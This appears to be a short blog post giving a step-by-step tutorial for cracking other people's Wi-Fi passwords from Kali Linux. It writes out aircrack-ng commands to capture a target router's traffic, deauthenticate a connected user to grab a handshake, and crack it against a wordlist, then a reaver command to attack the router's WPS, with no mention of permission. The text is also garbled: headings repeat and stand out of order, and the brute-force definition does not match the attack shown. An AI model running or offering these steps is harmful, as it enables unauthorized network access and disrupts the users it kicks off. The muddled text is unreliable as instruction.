There are 2 ways to hack an wireless network both of them require mon0 (monitoring mode) if you are not associated and authenticated to the network(connected).
Things that you might need:-
How to?
If you don't have the word in the word-list than you cannot hack the password.
Brute force attack:-
Brute Force Attack aims at being the simplest kind of method to gain access to a site: it tries usernames and passwords, over and over again, until it gets in.
How to?
Things that you might need:-
- Kali Linux on Vmware.
- Dlink dw-123.(or any other wireless card that supports monitoring mode)
Dictionary attack:-
A dictionary attack is a technique
for defeating a cipher or authentication mechanism by trying to determine its
decryption key or passphrase by trying hundreds or sometimes millions of likely
possibilities, such as words in a dictionary.
How to?
- Open a new terminal in Kali Linux and type airmon-ng start wlan0 and hit enter, here wlan0 can be replaced by interface name of your card.
- Now type airodump-ng mon0 and hit enter to get the list of networks in your range.
- Now type airodump-ng --bssid target’s bssid -c channel number --write filename mon0 and hit enter to capture the packets of the target router.
- Now on a new terminal window type aireplay-ng -0 5 --ignore-negative-one -a essid -c cleint essid mon0 to kick the user out and make him to authenticate himself once again which gives us an authentication frame.
- Now press Ctrl+c to stop the first terminal or close both terminals.
- Now type aircrack-ng -w “path to wordlist” filename.cap and hit enter to crack the hash.
Limitations:-
Brute force attack:-
Brute Force Attack aims at being the simplest kind of method to gain access to a site: it tries usernames and passwords, over and over again, until it gets in.
How to?
- Open a new terminal in Kali Linux and type airmon-ng start wlan0 and hit enter, here wlan0 can be replaced by interface name of your card.
- Now type airodump-ng mon0 to get the list of networks in your range.
- Now to deploy reaver you will need to type reaver -i mon0 -b bssid -vv and hit enter, after a few minutes or hours you will get the wps key wpa key of the router.
It takes a lot of time to crack the password and requires a stable traffic of the network.
No comments :
Post a Comment